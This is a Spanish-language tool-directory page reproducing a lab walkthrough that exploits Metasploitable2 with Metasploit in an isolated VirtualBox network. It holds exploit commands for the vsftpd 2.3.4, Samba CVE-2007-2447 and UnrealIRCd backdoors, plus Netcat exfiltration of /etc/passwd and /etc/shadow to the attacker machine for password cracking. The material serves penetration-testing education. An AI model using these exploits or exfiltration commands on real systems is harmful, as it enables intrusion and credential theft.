Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
metasploitable2-exploitation-metasploit — Walkthrough completo de explotación con Metasploit contra Metasploitable2 — backdoor de vsftpd, Samba CVE-2007-2447, backdoor de UnrealIRCd, exfiltración con Netcat y preparación para el cracking de credenciales. | Kitploit
Herramientas/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Descifrado de ContraseñasReconocimientoFrameworks de ExploitsMapeo de RedesAnálisis de VulnerabilidadesExplotaciónExfiltración de DatosPruebas de PenetraciónComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
Desarrollo de Payloads
Labs y Práctica
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Walkthrough completo de explotación con Metasploit contra Metasploitable2 — backdoor de vsftpd, Samba CVE-2007-2447, backdoor de UnrealIRCd, exfiltración con Netcat y preparación para el cracking de credenciales.

Ver Repositorio
9hace 2 mesesAún no revisado

Explotando Metasploitable2 con Metasploit: VSFTPD, Samba y Más

Un recorrido práctico de explotación con Metasploit Framework — desde la configuración de la base de datos PostgreSQL y el escaneo con db_nmap, pasando por tres shells de root vía vsftpd, Samba y UnrealIRCd, hasta la exfiltración de credenciales con Netcat.


Resumen

Este repositorio documenta un compromiso completo de Metasploit contra Metasploitable2 en un laboratorio aislado de VirtualBox. Temas cubiertos:

  • Configuración de Metasploit con backend PostgreSQL y workspaces
  • Ejecutar db_nmap para guardar los resultados del escaneo directamente en la base de datos
  • Explotar el backdoor de vsftpd 2.3.4 (compromiso de la cadena de suministro)
  • Explotar Samba CVE-2007-2447 (inyección de comandos en usermap_script)
  • Exfiltrar /etc/passwd y /etc/shadow con Netcat y combinarlos con unshadow
  • Explotar el backdoor de UnrealIRCd 3.2.8.1

Entorno de laboratorio

MáquinaRolDirección IP
Kali Linux 2026.1Atacante192.168.1.4
Metasploitable2Objetivo192.168.1.3

Red: 192.168.1.0/24 — red NAT completamente aislada dentro de VirtualBox.


Paso 1 — Configuración de Metasploit y Escaneo con Base de Datos

root@kitploit:~
# Start PostgreSQL and initialize the database (one time only)
sudo systemctl start postgresql
sudo msfdb init

# Launch Metasploit
msfconsole

Kali and Metasploitable2 running

Kali update and PostgreSQL start

root@kitploit:~
msf6> db_status           # Verify: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Confirm active workspace

db_status and workspace output

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

db_nmap scan in progress

root@kitploit:~
msf6> hosts
msf6> services

hosts and services output

Se encontraron dos servidores FTP en Metasploitable2:

PuertoServicioInformación
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

Paso 2 — Explotando vsftpd 2.3.4 (Backdoor)

En julio de 2011, el archivo fuente de vsftpd 2.3.4 fue comprometido: se insertó un backdoor que abre un shell de root en el puerto 6200 cuando el nombre de usuario FTP contiene :). CVE: CVE-2011-2523. Diff del código: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# Result: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

vsftpd exploit info - part 1

vsftpd exploit info - part 2

vsftpd show options

vsftpd set RHOSTS RPORT LHOST

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

vsftpd exploit execution and Meterpreter session

ls on remote root filesystem

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami root and uname -a output

Extraer contraseñas con hash:

root@kitploit:~
cat /etc/shadow | grep '$1'

shadow file hashed passwords


Paso 3 — Explotando Samba CVE-2007-2447

Las versiones 3.0.0–3.0.25rc3 de Samba pasan metacaracteres de shell en el campo de nombre de usuario directamente a /bin/sh mediante la opción username map script — antes de que ocurra la autenticación. Metasploitable2 ejecuta Samba 3.0.20-Debian.

root@kitploit:~
msf6> search type:exploit name:samba
# ~7 exploits found

msf6> use exploit/multi/samba/usermap_script
msf6> info

Samba exploit list from search

Samba usermap_script info

Samba CVE description and references

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Samba exploit execution - session opened

whoami root and smbd --version on Samba shell

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Exfiltración de archivos con Netcat

Pestaña 2 — Kali (recibiendo):

root@kitploit:~
nc -l -p 4567 > passwd.txt

Pestaña 1 — Shell de exploit (enviando):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Netcat listener on Kali receiving passwd

passwd.txt contents after exfiltration

Repite para /etc/shadow y luego combina:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

Paso 4 — Explotando UnrealIRCd 3.2.8.1 (Backdoor)

UnrealIRCd 3.2.8.1 se distribuyó con un backdoor en su código fuente. Enviar AB al puerto 6667 hace que el servidor ejecute cualquier comando posterior como root, sin requerir autenticación.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

UnrealIRCd exploit options and execution

UnrealIRCd root shell - whoami and uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Opciones requeridas:


Flujo de trabajo de Metasploit de un vistazo

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

Errores comunes


Conclusiones clave

  • vsftpd 2.3.4 y UnrealIRCd 3.2.8.1 fueron ambos compromisos de la cadena de suministro: backdoors incluidos en archivos oficiales de distribución
  • CVE-2007-2447 en Samba se dispara antes de la autenticación: parchear es la única mitigación
  • Netcat no requiere dependencias y funciona para exfiltrar archivos en prácticamente cualquier sistema Unix
  • info antes de exploit es un hábito que vale la pena adquirir: muestra el CVE, las versiones afectadas y las opciones requeridas

🌐 Conéctate conmigo

LinkedIn Dev.to

Descargar herramienta
OpciónValorDescripción
RHOSTS192.168.1.3IP del objetivo
RPORT6667Puerto predeterminado de IRC
LHOST192.168.1.4IP del listener de Kali
payloadcmd/unix/bind_netcatShell bind vía Netcat
ErrorQué ocurreSolución
Omitir msfdb initNo hay base de datos: los resultados del escaneo no se guardanEjecuta sudo msfdb init una vez antes del primer uso
No establecer LHOSTEl shell inverso no tiene a dónde llamarEstablece siempre LHOST a la IP de tu Kali
Ejecutar msfdb init en cada sesiónSobrescribe los datos existentesEjecútalo una sola vez; compruébalo con sudo msfdb status
Puerto RPORT incorrectoEl exploit falla silenciosamenteConfirma el puerto con services antes de configurarlo
Cerrar el listener de Netcat demasiado prontoTransferencia de archivos truncadaEspera un momento tras el comando con pipe antes de pulsar CTRL-C
Omitir unshadowLos crackers de contraseñas rechazan el formato de archivo divididoCombina siempre passwd + shadow primero